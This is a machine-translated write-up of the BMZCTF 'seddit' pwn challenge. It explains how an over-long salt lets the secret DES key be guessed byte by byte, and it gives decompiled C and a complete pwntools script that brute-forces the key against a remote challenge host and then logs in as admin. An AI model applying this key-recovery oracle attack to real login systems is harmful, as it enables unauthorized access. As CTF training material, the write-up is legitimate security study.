[BMZCTF-pwn] ectf-2014 seddit

At first, I saw a lot of spills , But because of canary None of this works . Or read the program from the beginning .

The program contains 3 block ：

1. First, read the user name and salt Salt is added after salt in the backstage key Get the key and then calculate the password through the key .
2. Log in with your username and password , User name is admin And after successful verification flag
3. of no avail

Obviously, if 1 Step by step admin It's easy to do. . Ran Wu .

This salt overflows ： Insufficient salt length 7 Bit time will be supplemented 7 Add 7 position key. If exceeded 7 Bits are used key Will be reduced accordingly . When salt is 13 Only the first... Is used in bit 1 position key. Then you can easily explode key Value . And then use des Calculate the password ok 了 .

unsigned __int64 __fastcall sub_400A04(__int64 a1, _QWORD *a2)
{
  char v3[140]; // [rsp+20h] [rbp-B0h] BYREF
  int fd; // [rsp+ACh] [rbp-24h]
  char dest[16]; // [rsp+B0h] [rbp-20h] BYREF
  char v6[8]; // [rsp+C0h] [rbp-10h] BYREF
  unsigned __int64 v7; // [rsp+C8h] [rbp-8h]

  v7 = __readfsqword(0x28u);
  *a2 = 0LL;
  *(_QWORD *)dest = 0LL;
  fd = open("key", 0);
  if ( strlen(byte_6020C0) <= 6 )  // When salt by 13 When a , Only for 1 position key  It can be blasted in sequence key
    strncpy(&byte_6020C0[strlen(byte_6020C0)], "aaaaaaa", 7 - strlen(byte_6020C0));
  strncpy(dest, byte_6020C0, strlen(byte_6020C0));
  read(fd, &dest[strlen(byte_6020C0)], 7uLL);
  dest[14] = 0;
  close(fd);
  DES_string_to_key(dest, v6);
  DES_set_key(v6, v3);
  DES_ecb_encrypt(a1, a2, v3, 1LL);
  return __readfsqword(0x28u) ^ v7;
}

The other is to write programs des It's not necessarily easy , You can directly put the original program patch Let him not check admin user name , In this way, you can get the password through the original program .

from pwn import *

local = 1
if local == 1:
    p = process('./pwn')
else:
    p = remote('node4.buuoj.cn', 28546) 

elf = ELF('./pwn')
context.arch = 'amd64'

def getkey(salt):
    p.sendlineafter(b"What would you like to do? ", b'1')
    p.sendlineafter(b"Enter username:", b's')
    p.sendlineafter(b"Enter salt:", salt)
    p.recvuntil(b'Your password is: ')
    return p.recv(16)

def password():
    tp = process('./pwn_local')
    tp.sendlineafter(b"What would you like to do? ", b'1')
    tp.sendlineafter(b"Enter username:", b'admin')
    tp.sendlineafter(b"Enter salt:", b'aaaaaaa')
    tp.recvuntil(b'Your password is: ')
    return tp.recv(16)

def getflag(password):
    p.sendlineafter(b"What would you like to do? ", b'2')
    p.sendlineafter(b"Enter username:", b'admin')
    p.sendlineafter(b"Enter password:", password)
    return p.recv()

key = b''
for i in range(13,6,-1):
    salt = b'A'*i
    tmpkey = getkey(salt)
    print(tmpkey)
    for j in range(0x21,0x80):
        tmp = getkey(salt+key+p8(j))  # Bitwise shortened salt+key Known parts + guess   The same password is correct key
        if tmp == tmpkey:
            key += p8(j)
            print('key:', key)
            break

open('key', 'wb').write(key)

password = password() # Use local program operation to find the password 
print(password)
context.log_level = 'debug'
    
print(getflag(password))

pause()